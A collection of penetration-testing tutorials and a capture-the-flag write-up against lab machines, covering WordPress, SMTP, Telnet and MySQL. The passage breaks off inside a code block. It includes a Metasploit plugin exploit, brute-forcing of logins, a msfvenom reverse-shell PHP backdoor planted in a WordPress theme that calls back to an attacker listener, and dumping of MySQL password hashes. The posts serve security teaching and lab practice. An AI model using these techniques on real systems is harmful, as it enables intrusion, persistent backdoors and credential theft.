Enumerating vulnerable WordPress themes

To list only installed themes with known vulnerabilities, type:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vt

The scan found no vulnerable theme, so there is nothing to exploit on that front.

Enumerating WordPress plugins

Plugins are small pieces of code that can be added to a WordPress website to extend its functionality.

To find the plugins installed on the target WordPress site, type in the terminal:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate p

After a few seconds you get the list of installed plugins. In my scan result the detected plugins were akismet v3.3.3, pixabay-images v2.14 and wptouch v3.4.3, along with the last update date and latest available version of each.

Enumerating vulnerable WordPress plugins

Now type the following command to list installed plugins with known vulnerabilities:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vp

After a few seconds you get the vulnerable plugins. In the output the red entries mark vulnerable plugins, each with references to the corresponding CVE or exploit.

Exploit a vulnerable plugin using Metasploit

This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery plugin version 3.1.3. The vulnerability allows arbitrary file upload and remote code execution.

Open a terminal, load the Metasploit framework and execute the following commands:

use exploit/unix/webapp/wp_reflexgallery_file_upload

msf exploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101

msf exploit(wp_reflexgallery_file_upload) > set targeturi /wordpress/

msf exploit(wp_reflexgallery_file_upload) > exploit

Awesome!! We get a Meterpreter session on the victim's web server.

meterpreter > sysinfo

Enumerating WordPress usernames

To enumerate the usernames of the WordPress site, execute:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate u

After some time it dumps a table of usernames. In this scan three users were found:

ID 1: admin

ID 2: ignite

ID: demo
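The version and username enumeration above relies on three things WordPress exposes by default. The Python below, an added illustration rather than WPScan's own code, reproduces the logic offline against constructed responses: the generator meta tag for the version, the redirect that ?author=N performs to /author/<nicename>/, and the /wp-json/wp/v2/users endpoint (WordPress 4.7 and later). The sample HTML, redirect targets and JSON are constructed to match the article's results, not captured from the lab.

```python
import json
import re
from urllib.parse import urlparse

GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="WordPress\s+([\d.]+)"', re.I)
AUTHOR_PATH_RE = re.compile(r"/author/([^/?#]+)/?$")


def wp_version(html):
    """Return the version from the generator meta tag, or None if the site stripped it."""
    m = GENERATOR_RE.search(html)
    return m.group(1) if m else None


def users_from_author_redirects(redirects):
    """redirects maps an author id probed with ?author=N to the Location header received.
    WordPress answers with a 302 to /author/<user_nicename>/ when the id exists, so the
    path leaks a name per id. Ids without an author redirect are ignored."""
    found = {}
    for author_id, location in redirects.items():
        m = AUTHOR_PATH_RE.search(urlparse(location).path)
        if m:
            found[author_id] = m.group(1)
    return found


def users_from_rest_api(body):
    """/wp-json/wp/v2/users lists users with published posts; 'slug' is the user_nicename."""
    return {entry["id"]: entry["slug"] for entry in json.loads(body)}


def merge_users(*sources):
    """Combine id->name maps from the different techniques into one sorted list of (id, name)."""
    merged = {}
    for source in sources:
        merged.update(source)
    return sorted(merged.items())


if __name__ == "__main__":
    # Constructed sample data modelled on the article's scan results.
    html = '<html><head><meta name="generator" content="WordPress 4.8.1" /></head></html>'
    redirects = {
        1: "http://192.168.0.101/wordpress/author/admin/",
        2: "http://192.168.0.101/wordpress/author/ignite/",
        4: "http://192.168.0.101/wordpress/",          # id does not exist: redirected home
    }
    rest_body = json.dumps([{"id": 1, "slug": "admin"}, {"id": 3, "slug": "demo"}])
    print(wp_version(html))
    print(merge_users(users_from_author_redirects(redirects), users_from_rest_api(rest_body)))
```

The nicename is the login name unless the user changed it, so treat the result as a strong hint to confirm against the login form rather than as proof; a site that has removed the generator tag and disabled author archives and the users endpoint will return nothing from all three checks, which is itself a useful hardening indicator.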

Enumerate ALL with a single command

Everything scanned above can be enumerated at once with:

./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u

The options -e at -e ap -e u mean:

-e at: enumerate all themes of the targeted website

-e ap: enumerate all plugins of the targeted website

-e u: enumerate usernames of the targeted website

Brute force attack using WPScan

With the username enumerated above we can build a password wordlist for the user admin and run a brute-force login attack:

./wpscan.rb -u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt --username admin

WPScan tries each password for the given username and reports the result; in this case it found the credentials admin:password.

Generate a PHP backdoor in WordPress

With these credentials you can log in to the admin panel, where an administrator is allowed to edit theme files. We abuse that right to plant a malicious PHP script that gives us a reverse connection from the web server.

Once inside the admin panel, click Appearance in the dashboard and select Editor.

Select the 404.php template from the list on the right; the middle frame shows the PHP code of the 404 template. Erase the entire code so that the malicious PHP can take its place.

Now use msfvenom to generate the malicious PHP script:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

Copy the generated PHP from <?php up to and including die(); (msfvenom wraps the opening tag in a /* ... */ comment; the <?php itself is what matters).

Paste the copied PHP into the 404.php template of the active theme and save the file.

On the other side, load the Metasploit framework and start multi/handler:

use exploit/multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Requesting the modified 404.php in a browser executes the payload, and the handler receives the reverse connection as a Meterpreter session on the victim's server:

http://192.168.0.101/wordpress/wp-content/themes/twentyseventeen/404.php

The screenshot shows the shell on the victim obtained through Meterpreter.

meterpreter > sysinfo

In this way, using WPScan and Metasploit, an administrator can check the strengths and weaknesses of a WordPress website.

AUTHOR: Akshay Bhardwaj is a passionate Hacker, Information Security Enthusiast and Researcher | Sketch Artist | Technical Writer.

The post WordPress Penetration Testing using WPScan & Metasploit appeared first on Hacking Articles.


Hack the Primer VM (CTF Challenge)

Tue, 26/Sep/2017 - 13:56

Hello friends! Today we are going to take on another CTF challenge known as Primer. The credit for making this VM goes to “couchsofa”; it is a boot2root challenge where we have to root the VM to complete it. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here it is 192.168.1.115, but you will have to find your own):

netdiscover

Use nmap for port enumeration:

nmap -sV 192.168.1.115

Port 80 is open, so we open the IP address in the browser.

We use dirb to list directories and find robots.txt:

dirb http://192.168.1.115/ -w

Inside robots.txt we find a link to a page.

We open this link; it leads to a page with a story on it.

We take a look at the page source and find another link.

When we open it, we find a link on the page.

When we open that link, we are prompted for a password.

We capture the request to this page in Burp Suite and send it to Repeater. In the server's response we find another link.

When we open the link, we find another page that prompts for a password.

Now we take a look at the URL. The last part looks like an MD5 hash, so we strip the leading number and underscore and find something interesting.

The URLs are actually prime numbers converted into MD5 hashes. We are on page 7, and its hash is the MD5 of 17, the 7th prime. So we convert 19 (the next prime) to its MD5 hash.

To open the page we add “8_” in front of the hash to complete the URL. We open it in the browser and find a page.
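The page names follow a pattern the writeup only sketches: page n is named after the MD5 of the n-th prime, written as <n>_<hash>. The Python below, added as an illustration and not part of the writeup, generates the slug for any page so the whole chain can be walked without hand-computing hashes, and checks a slug found in a URL against the scheme. It assumes the hash is taken over the decimal string of the prime, which matches the 7 -> 17 and 8 -> 19 steps described.

```python
import hashlib


def nth_prime(n):
    """Return the n-th prime, 1-indexed: nth_prime(1) == 2, nth_prime(7) == 17."""
    if n < 1:
        raise ValueError("n must be >= 1")
    primes = []
    candidate = 2
    while len(primes) < n:
        # Trial division by the primes found so far, up to sqrt(candidate).
        if all(candidate % p for p in primes if p * p <= candidate):
            primes.append(candidate)
        candidate += 1
    return primes[-1]


def page_slug(n):
    """Build '<n>_<md5 of the n-th prime>' for page n of the challenge (assumed scheme)."""
    digest = hashlib.md5(str(nth_prime(n)).encode("ascii")).hexdigest()
    return f"{n}_{digest}"


def decode_slug(slug, max_page=100):
    """Reverse the scheme: given a slug from a URL, return (page, prime) if the hash is the
    MD5 of the expected prime, otherwise None. This is the check the writeup did by hand."""
    n_text, _, digest = slug.partition("_")
    if not n_text.isdigit():
        return None
    n = int(n_text)
    if n < 1 or n > max_page or page_slug(n) != slug:
        return None
    return n, nth_prime(n)


if __name__ == "__main__":
    for n in range(6, 10):
        print(page_slug(n))
    print(decode_slug(page_slug(7)))
```

Running it shows that page 8 is 8_ followed by the MD5 of "19", which is the URL the writeup constructs by hand.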

We take a look at the source and find another URL.

We open it and find a custom terminal that uses JavaScript to execute certain commands.

In the ~/usr/falken/ folder we find a hint, and when we look at the running processes we find a command we need to run.

When we run connect falken@Erebus it prompts for a password. A hint in the log files suggests the password is related to Joshua, and the logs give his date of birth as 6 August 1984. We use cupp to create a dictionary file.

We use Burp Suite to brute-force the password and find that it is joshua1984.

When we log in, we find another page with a terminal.

We check the files and find a few encoded log files. We use the decode command provided by the terminal to decode them.

There we find our next clue: we google “trivial zero” and find it was discovered by Riemann. We use cupp to create a dictionary with the given information.

We use Burp Suite to brute-force the password and find it to be Riemann.

When we log in we are presented with yet another terminal.

Looking through the files we find MD5 hashes next to usernames. We check the processes and again find a command.

When we crack the MD5 hashes, we find that they are the passwords for the respective usernames.

When we log in, we are again presented with another terminal.

Looking through the files we find a username, password and hostname.

We use these to log in and find a page announcing the end of the challenge.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

The post Hack the Primer VM (CTF Challenge) appeared first on Hacking Articles.


4 ways to SMTP Enumeration

Mon, 25/Sep/2017 - 21:34

We can also find out the version of the SMTP server and probe for valid users using telnet. Execute the following command to read the banner and then probe for users.

Telnet

telnet 192.168.1.107 25

The banner “220 mail.ignite.lab ESMTP Postfix” shows that Postfix is running on the target machine.

You can probe for a valid user account with the following command; a reply code of 550 means the user is unknown:

vrfy raj@mail.ignite.lab

A reply code of 250, 251 or 252 means the server accepted the request and the account is valid. Note that 252 strictly means “cannot verify, but will try to deliver”; some servers return it for every address, so compare against a name that cannot exist before trusting the result.

If you receive reply code 550 the account is invalid, as the following example shows:

vrfy admin@mail.ignite.lab
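The VRFY probing above reduces to reading the first three digits of each reply. The Python below, an added example rather than the article's own commands, runs that logic against a small constructed stand-in for a Postfix server so it can be exercised offline; the replies are modelled on Postfix wording but are constructed, not captured. It adds two checks a practitioner wants: a control probe with a random name (a server that says 2xx to everyone makes the method useless) and a fallback to RCPT TO when VRFY is disabled (Postfix answers 502).

```python
import random
import string


class FakePostfix:
    """Minimal stand-in for a Postfix smtpd so the enumeration logic runs offline.
    Reply texts are modelled on Postfix (constructed for this example, not captured)."""

    def __init__(self, domain, users, vrfy_enabled=True):
        self.domain = domain
        self.users = set(users)
        self.vrfy_enabled = vrfy_enabled
        self.banner = f"220 {domain} ESMTP Postfix"
        self.sent = []                       # every command the client issued, for inspection

    def send(self, line):
        """Accept one SMTP command line and return the server's reply line."""
        self.sent.append(line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return f"250 {self.domain}"
        if verb == "VRFY":
            if not self.vrfy_enabled:
                return "502 5.5.1 VRFY command is disabled"
            if self._local_part(arg) in self.users:
                return f"252 2.0.0 {arg}"
            return f"550 5.1.1 <{arg}>: Recipient address rejected: User unknown in local recipient table"
        if verb == "MAIL":
            return "250 2.1.0 Ok"
        if verb == "RCPT":
            if self._local_part(arg.partition(":")[2]) in self.users:
                return "250 2.1.5 Ok"
            return "550 5.1.1 Recipient address rejected: User unknown in local recipient table"
        if verb == "RSET":
            return "250 2.0.0 Ok"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "502 5.5.2 Error: command not recognized"

    @staticmethod
    def _local_part(address):
        return address.strip().strip("<>").split("@")[0]


def probe(conn, user, domain, method):
    """Ask the server about one user with VRFY or with a MAIL FROM / RCPT TO pair."""
    if method == "VRFY":
        return conn.send(f"VRFY {user}@{domain}")
    conn.send("RSET")
    conn.send("MAIL FROM:<probe@example.invalid>")
    return conn.send(f"RCPT TO:<{user}@{domain}>")


def enumerate_users(conn, domain, candidates, method="VRFY"):
    """Return (method_used, [valid users]).

    2xx = accepted, 550 = unknown, as in the article. A random control name is probed first:
    if the server accepts it, its positive answers mean nothing for this method. If VRFY is
    disabled (502) the function retries with RCPT TO, which servers rarely disable."""
    control = "".join(random.choices(string.ascii_lowercase, k=12))
    reply = probe(conn, control, domain, method)
    if method == "VRFY" and reply.startswith("502"):
        return enumerate_users(conn, domain, candidates, method="RCPT")
    if reply.startswith("2"):
        raise RuntimeError(f"{method} accepted nonexistent user {control!r}: {reply}")
    found = [u for u in candidates if probe(conn, u, domain, method)[:3] in ("250", "251", "252")]
    return method, found


if __name__ == "__main__":
    server = FakePostfix("mail.ignite.lab", ["raj", "admin", "root"])
    print(server.banner)
    print(enumerate_users(server, "mail.ignite.lab", ["raj", "admin", "aarti", "guest"]))
    locked_down = FakePostfix("mail.ignite.lab", ["raj"], vrfy_enabled=False)
    print(enumerate_users(locked_down, "mail.ignite.lab", ["raj", "guest"]))
```

Against a real server, replace FakePostfix with an object whose send() writes the line plus CRLF to the socket and returns the reply line; the rest of the logic is unchanged. The RCPT TO fallback never sends DATA, so no mail is generated, but each probe is still a logged transaction on the target.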

Metasploit

The SMTP service has two commands that allow enumeration of users: VRFY (confirms the names of valid users) and EXPN (reveals the actual addresses behind aliases and mailing lists). Where these commands are implemented, they can be used to reveal a list of valid users.

use auxiliary/scanner/smtp/smtp_enum

msf auxiliary(smtp_enum) > set rhosts 192.168.1.107

msf auxiliary(smtp_enum) > set rport 25

msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt

msf auxiliary(smtp_enum) > exploit

The module lists the valid usernames found on the target and also grabs the SMTP banner.

smtp-user-enum

smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. It could be adapted to work against other vulnerable SMTP daemons, but this hasn’t been done as of v1.0.

Type the following command to enumerate usernames using a dictionary of usernames:

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

-M mode: method to use for username guessing: EXPN, VRFY or RCPT

-U file: file of usernames to check via the SMTP service

-t host: server host running the SMTP service

Out of the 7 names queried, only 5 exist on the SMTP server.

Type the following command to verify a user's email address on the mail server:

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

-D dom: domain to append to the supplied users to form email addresses; use this option when you want to guess valid email addresses instead of just usernames.

The output shows that raj@mail.ignite.lab is a valid email address for user raj.

iSMTP

iSMTP is a Kali Linux tool for testing SMTP user enumeration (RCPT TO and VRFY), internal spoofing and relaying.

Type the following command to enumerate valid email addresses on the target server:

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

-h <host>: the target IP and port (IP:port)

-e <file>: enable SMTP user enumeration testing and import the email list

In the output, blue text marks valid email accounts and red text marks invalid ones.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post 4 ways to SMTP Enumeration appeared first on Hacking Articles.


Penetration Testing on Telnet (Port 23)

Sat, 23/Sep/2017 - 16:54

Welcome to internal penetration testing on a Telnet server, where you will learn Telnet installation and configuration, enumeration and attack, and how to secure the service.

From Wikipedia

Telnet is a protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. This protocol is used to establish a connection to Transmission Control Protocol (TCP) port number 23, where a Telnet server application (telnetd) is listening.

Let’s start!!!

Requirements

Telnet Server: Ubuntu

Attacker system: Kali Linux

Telnet installation & configuration in 3 steps

Installing the Telnet server is simple; the following three steps get it running:

  • Open a terminal on Ubuntu and run the following command as root.

apt-get install xinetd telnetd

  • Open inetd.conf, add the following line and save it.

gedit /etc/inetd.conf

telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd

  • Now open xinetd.conf, add the following configuration and save it.

gedit /etc/xinetd.conf

# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/

defaults
{
# Please note that you need a log_type line to be able to use log_on_success
# and log_on_failure. The default is the following :
# log_type = SYSLOG daemon info

        instances = 60
        log_type = SYSLOG authpriv
        log_on_success = HOST PID
        log_on_failure = HOST
        cps = 25 30
}

includedir /etc/xinetd.d

Now restart the service:

sudo /etc/init.d/xinetd restart

Now check whether the Telnet service is active by scanning your own system with nmap:

nmap -p 23 127.0.0.1

If the service is running, nmap reports port 23 in the open state.

SSH banner grabbing through telnet

The telnet client is a handy tool for grabbing the banners of other services running on a target. Open a terminal in Kali Linux and type the following command to find the version of the SSH service on the target:

telnet 192.168.0.106 22

The server replies with its banner, “SSH-2.0-OpenSSH_6.6.1p1”, which reveals the SSH version installed on the target.

SMTP banner grabbing through telnet

Similarly, we can find out the version of an SMTP server and probe for valid users. Execute the following command:

telnet 192.168.0.25 25

The banner “220 mail.ignite.lab ESMTP Postfix” shows that Postfix is running on the target machine.

You can probe for a valid user account with the following command; a reply code of 550 means the user is unknown:

vrfy raj@mail.ignite.lab

A reply code of 250, 251 or 252 means the server accepted the request and the account is valid.

If you receive reply code 550 the account is invalid, as the following example shows:

vrfy raaz@mail.ignite.lab

Telnet banner grabbing through Metasploit

An attacker always enumerates first to find information such as software versions, which is known as banner grabbing, and then checks whether those versions are vulnerable to any known exploit.

Open a terminal in Kali Linux, load the Metasploit framework and type the following commands to scan for the Telnet version:

use auxiliary/scanner/telnet/telnet_version

msf auxiliary(telnet_version) > set rhosts 192.168.0.106

msf auxiliary(telnet_version) > set rport 23

msf auxiliary(telnet_version) > set threads 5

msf auxiliary(telnet_version) > exploit

The highlighted text in the output shows the Telnet banner of the target system.

Brute Force Attack

An attacker tries brute-force attacks to steal credentials and gain unauthorized access.

This module tests Telnet logins on a range of machines and reports successful logins. If a database plugin is loaded and connected, it records the successful logins and hosts so you can track your access.

Now type the following commands to brute-force the Telnet login:

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set rhosts 192.168.0.106

msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(telnet_login) > set stop_on_success true

msf auxiliary(telnet_login) > exploit

The output shows that the Telnet server is not protected against brute force: the module found the valid combination username raj, password 123, and at the same time opened a command shell on the victim as session 1.

We now have unauthorized access to the victim's system as raj@ignite and can run ifconfig to verify its network interfaces.

The command shell can be upgraded to a Meterpreter session with:

sessions -u 1

We now have two sessions: session 1 is the command shell and session 2 is the Meterpreter session.

Stealing credentials through sniffing

Telnet does not encrypt anything sent over the connection, passwords included, so anyone who can observe the network path between the two hosts can intercept the packets, obtain the login, the password and the session data, and reuse them later.

Here the client logs in to the Telnet server with valid credentials while the attacker captures the traffic with Wireshark or a similar tool.

Wireshark reconstructs the Telnet session from the captured packets. Like FTP, Telnet authenticates users with a clear-text sign-in: the username and password cross the wire as typed, so the attacker reads them straight out of the capture.

The reconstructed stream shows the username raj and password 123, along with everything else sent between source and destination.

Because Telnet implementations generally lack Transport Layer Security (TLS) and Simple Authentication and Security Layer (SASL) extensions, the Secure Shell (SSH) protocol, first released in 1995, replaced Telnet for remote administration.
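What Wireshark's “Follow TCP Stream” shows for a Telnet login can be reproduced from the raw bytes. The Python below is an added example, not part of the article or of Wireshark: it strips the IAC option negotiation from each direction of a constructed Telnet stream, applies the backspaces the user typed, and pairs the server's login and password prompts with the client's answers. The byte strings are constructed to resemble a Linux telnetd login for the article's user raj, not captured from the lab.

```python
import re

IAC, SB, SE = 0xFF, 0xFA, 0xF0
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE


def strip_negotiation(stream):
    """Remove Telnet IAC command sequences from one direction of a TCP stream.

    Leaves only application data: keystrokes in the client->server direction, prompts and
    echoes in the server->client direction."""
    out = bytearray()
    i = 0
    while i < len(stream):
        b = stream[i]
        if b != IAC:
            out.append(b)
            i += 1
            continue
        if i + 1 >= len(stream):
            break                                   # dangling IAC at the end of the capture
        cmd = stream[i + 1]
        if cmd == IAC:                              # IAC IAC is an escaped 0xFF data byte
            out.append(IAC)
            i += 2
        elif cmd == SB:                             # subnegotiation runs until IAC SE
            end = stream.find(bytes([IAC, SE]), i + 2)
            i = len(stream) if end == -1 else end + 2
        elif cmd in (WILL, WONT, DO, DONT):         # three-byte option negotiation
            i += 3
        else:                                       # two-byte command (NOP, GA, ...)
            i += 2
    return bytes(out)


def apply_edits(text):
    """Apply backspace (0x08) and DEL (0x7f) so the result is what the user ended up sending."""
    buf = []
    for ch in text:
        if ch in ("\b", "\x7f"):
            if buf:
                buf.pop()
        else:
            buf.append(ch)
    return "".join(buf)


def recover_login(client_to_server, server_to_client):
    """Pair the server's 'login:' / 'Password:' prompts with the lines the client sent.

    Returns a dict like {"login": "raj", "password": "123"}. Telnet clients send the
    credentials in clear text; the password simply is not echoed by the server."""
    typed = strip_negotiation(client_to_server).decode("latin-1")
    shown = strip_negotiation(server_to_client).decode("latin-1")
    # Telnet end-of-line is CR LF, or CR NUL when the client sends a bare carriage return.
    answers = [apply_edits(a) for a in re.split(r"\r\n|\r\x00|\n", typed)]
    prompts = re.findall(r"(login|password)\s*:", shown, re.I)
    return {prompt.lower(): answer for prompt, answer in zip(prompts, answers)}


if __name__ == "__main__":
    # Constructed streams: option negotiation, then the user types "raj", then "12<DEL>23".
    client = (b"\xff\xfd\x03\xff\xfb\x18\xff\xfa\x18\x00XTERM\xff\xf0"
              b"raj\r\n" b"12\x7f23\r\n")
    server = (b"\xff\xfd\x18\xff\xfd\x20\xff\xfb\x03"
              b"Ubuntu 14.04.5 LTS\r\nignite login: " b"raj\r\n" b"Password: " b"\r\n")
    print(recover_login(client, server))
```

With a pcap in hand, the two byte strings are simply the payloads of each direction of the TCP stream concatenated in order; the pairing by prompt order holds for the usual login/password sequence and would need timestamps for anything more elaborate. The same stripping applies to any other clear-text protocol that embeds control sequences, which is why a packet-level view of Telnet looks noisier than FTP's.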

Moving Telnet to a non-default port

An administrator can move the Telnet service from its default port to another one. Open the services file for editing:

gedit /etc/services

The file shows that Telnet uses port 23 by default; change the port number for the telnet entry.

Here port 23 was replaced with 2323; now restart the service:

service xinetd restart

Verify the new port with nmap:

nmap -p 2323 -sV 192.168.0.106

Note that nmap's service detection (-sV) still identifies Telnet on the new port, as this very scan shows: moving the port hides the service only from scans that look at the default port, and does nothing against the sniffing and brute-force attacks above.

Secure telnet against brute force attack

You can secure telnet server against brute force and from unauthorized access by adding filter using Iptable. Allow only specific IP address to establish connection with telnet server and reject or drop the connection from other IP addresses.

Now type following command with root permission to add filter for telnet in iptables.

Iptables –A INPUT –s 192.168.0.104 –p tcp –dport 23 –j ACCEPT

Above command will allow the traffic from IP address 192.168.0.104 to access the telnet service on port 23.

Iptables –A INPUT –p tcp –dport 23 –j DROP

Above command with drop the service for traffic coming from other IP addresses on port 23.

Restart the service once you add filter in iptables

sudo /etc/init.d/xinetd restart

Let's verify that the iptables rule works by connecting to the telnet server from the client machine holding IP address 192.168.0.104.

Great!! Connection established successfully.

You can confirm it from given below image.

Now let's verify the rule again by connecting to the telnet server from the attacker machine, which holds a different IP address.

From the image below you can see that nothing happens here, because port 23 is closed to all other IP addresses.

Awesome!! This means that even if an attacker sniffs valid credentials, they will still not be able to access the telnet server.
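Because iptables -A appends and the first matching rule wins, the allow-list above only works if the ACCEPT rule sits before the DROP. The following check, an added example that is not part of the article, parses an iptables -S INPUT listing and reports a missing ACCEPT, a missing catch-all DROP, or an ACCEPT that comes after the DROP; the two listings inside it are constructed.

```python
"""Check that an INPUT chain enforces a telnet allow-list: ACCEPT for each
trusted source on the telnet port, a catch-all DROP for that port, and every
ACCEPT placed before the DROP (iptables -A appends; first match wins).
Added example, not code from the article; listings below are constructed
to look like `iptables -S INPUT` output."""
import shlex


def parse_rules(listing: str) -> list:
    """Turn `iptables -S` lines into dicts of the options this check needs."""
    rules = []
    for line in listing.splitlines():
        tokens = shlex.split(line)
        if len(tokens) < 2 or tokens[0] != "-A":
            continue                      # skips blanks and the -P policy line
        rule = {"chain": tokens[1], "src": None, "proto": None,
                "dport": None, "target": None}
        for opt, val in zip(tokens[2::2], tokens[3::2]):   # every option here takes one value
            if opt == "-s":
                rule["src"] = val.split("/")[0]           # iptables prints 1.2.3.4/32
            elif opt == "-p":
                rule["proto"] = val
            elif opt == "--dport":
                rule["dport"] = int(val)
            elif opt == "-j":
                rule["target"] = val
        rules.append(rule)
    return rules


def telnet_allowlist_problems(listing: str, allowed_ips: set, port: int = 23) -> list:
    """Return the policy problems found; an empty list means the allow-list is enforced."""
    problems = []
    relevant = [r for r in parse_rules(listing)
                if r["chain"] == "INPUT" and r["proto"] == "tcp" and r["dport"] == port]
    drop_at = next((i for i, r in enumerate(relevant)
                    if r["target"] == "DROP" and r["src"] is None), None)
    if drop_at is None:
        problems.append(f"no catch-all DROP for tcp/{port}: every other host can still connect")
    for ip in sorted(allowed_ips):
        accept_at = next((i for i, r in enumerate(relevant)
                          if r["target"] == "ACCEPT" and r["src"] == ip), None)
        if accept_at is None:
            problems.append(f"no ACCEPT for {ip} on tcp/{port}")
        elif drop_at is not None and accept_at > drop_at:
            problems.append(f"ACCEPT for {ip} is after the DROP, so it never matches")
    return problems


# Constructed listings: rules added in the article's order, and in the reverse order.
GOOD_LISTING = """-P INPUT ACCEPT
-A INPUT -s 192.168.0.104/32 -p tcp -m tcp --dport 23 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 23 -j DROP
"""
REVERSED_LISTING = """-P INPUT ACCEPT
-A INPUT -p tcp -m tcp --dport 23 -j DROP
-A INPUT -s 192.168.0.104/32 -p tcp -m tcp --dport 23 -j ACCEPT
"""
```

Run it against the real output of iptables -S INPUT on the server after the port change to 2323 by passing port=2323, since the rules above only cover port 23.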

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post Penetration Testing on Telnet (Port 23) appeared first on Hacking Articles.

Categories: Cyber India

MySQL Penetration Testing with Nmap

Thu, 21/Sep/2017 - 20:42

In this article we are discussing MySQL penetration testing using Nmap, where you will learn how to retrieve database information such as database names, table records, usernames, passwords and more.

MySQL is an open-source relational database management system that uses Structured Query Language (SQL) to manage database records.

Let's Begin!!!

Scanning for port 3306

Open the terminal and type the following command to check whether the mysql service is running on the targeted system; by default the mysql service listens on port 3306.

nmap -sT 192.168.1.216

From the given image you can observe that port 3306 is open for the mysql service; now let's enumerate it.

Retrieve mysql information

Now type another command to retrieve mysql information such as version, protocol and etc:

nmap --script=mysql-info 192.168.1.216

The above command connects to the MySQL server and prints information such as the protocol: 10, version number: 5.5.57-0ubuntu0.14.04.1, thread ID: 159, status: autocommit, capabilities, and the password salt, as shown in the image below.

Brute force attack

This command uses a dictionary for the username and one for the password and tries to find a valid username and password combination by brute-forcing the mysql service.

nmap -p 3306 --script mysql-brute --script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

From the given image you can observe that it found the valid credential root:toor. This credential allows direct login to the MySQL server.

Retrieve mysql user names

This command fetches the mysql user names with the help of the given arguments mysqluser=root and mysqlpass=toor.

nmap -p 3306 --script=mysql-users 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the image below you can see that we found four user names: root, debian-sys-maint, sr, st.

Retrieve database names

This command fetches the mysql database names with the help of the given arguments mysqluser=root and mysqlpass=toor.

nmap -p 3306 --script=mysql-databases 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the image below you can read the name of the created database, such as ignite.

This command performs the same task as above, but retrieves the database names using the mysql query "show databases":

nmap -p 3306 192.168.1.216 --script mysql-query --script-args "query=show databases,username=root,password=toor"

From the image below you can again read the name of the created database, such as ignite.

Retrieve mysql variable status ON/OFF

When we want to pass a value from one SQL statement to another, we store the value in a MySQL user-defined variable.

This command fetches the mysql variable names with the help of the given arguments mysqluser=root and mysqlpass=toor.

nmap -p 3306 --script=mysql-variables 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the given image you can observe the ON/OFF status of each mysql variable.

Retrieve Hash password

This command dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.

nmap -p 3306 --script=mysql-dump-hashes 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the given image you can observe that it dumped the password hash of each user we enumerated above.

Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post MySQL Penetration Testing with Nmap appeared first on Hacking Articles.

Categories: Cyber India

Penetration Testing on MYSQL (Port 3306)

Thu, 21/Sep/2017 - 18:25

Hello friends!! Today we are discussing internal penetration testing on a MySQL server. In our previous article we already discussed how to configure mysql on Ubuntu, which you can read here; now we move on to its penetration testing.

Attacker: kali Linux

Target: ubuntu 14.04.1 (mysql server), IP: 192.168.1.216

Let's start!!

Scanning MYSQL

Scanning plays an important role in penetration testing because through scanning the attacker determines which services and open ports are available for enumeration and attack.

Here we are using nmap for scanning port 3306. 

nmap -sT 192.168.1.216

If the service is running on the targeted server, nmap shows the STATE of port 3306 as open.

Enumerating MYSQL Banner

An attacker always performs enumeration to find important information such as the software version (known as banner grabbing) and then checks whether that version is vulnerable to any exploit.

Open the terminal in your Kali Linux and load the Metasploit framework; now type the following commands to scan for the MySQL version.

msf > use auxiliary/scanner/mysql/mysql_version

msf auxiliary(mysql_version) > set rhosts 192.168.1.216

msf auxiliary(mysql_version) > set rport 3306

msf auxiliary(mysql_version) > run

From the given image you can read the highlighted text, which shows that MySQL 5.5.57 is the installed version of MySQL, speaking protocol 10, on the Ubuntu 14.04.1 operating system.
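Both nmap's mysql-info script (in the previous post) and the mysql_version module above read these values from the same place: the Protocol::HandshakeV10 greeting the server sends before any authentication. The parser below is an added example, not code from the article or from either tool; it decodes that greeting into the protocol, version, thread ID, autocommit status, capabilities and salt, and the sample packet it builds is constructed to carry the values the article's target reported.

```python
"""Parse a MySQL Protocol::HandshakeV10 greeting, the first packet the server
sends on connect and the source of what nmap's mysql-info script and
Metasploit's mysql_version module report.  Added example, not code from the
article or either tool; the sample packet below is constructed."""
import struct

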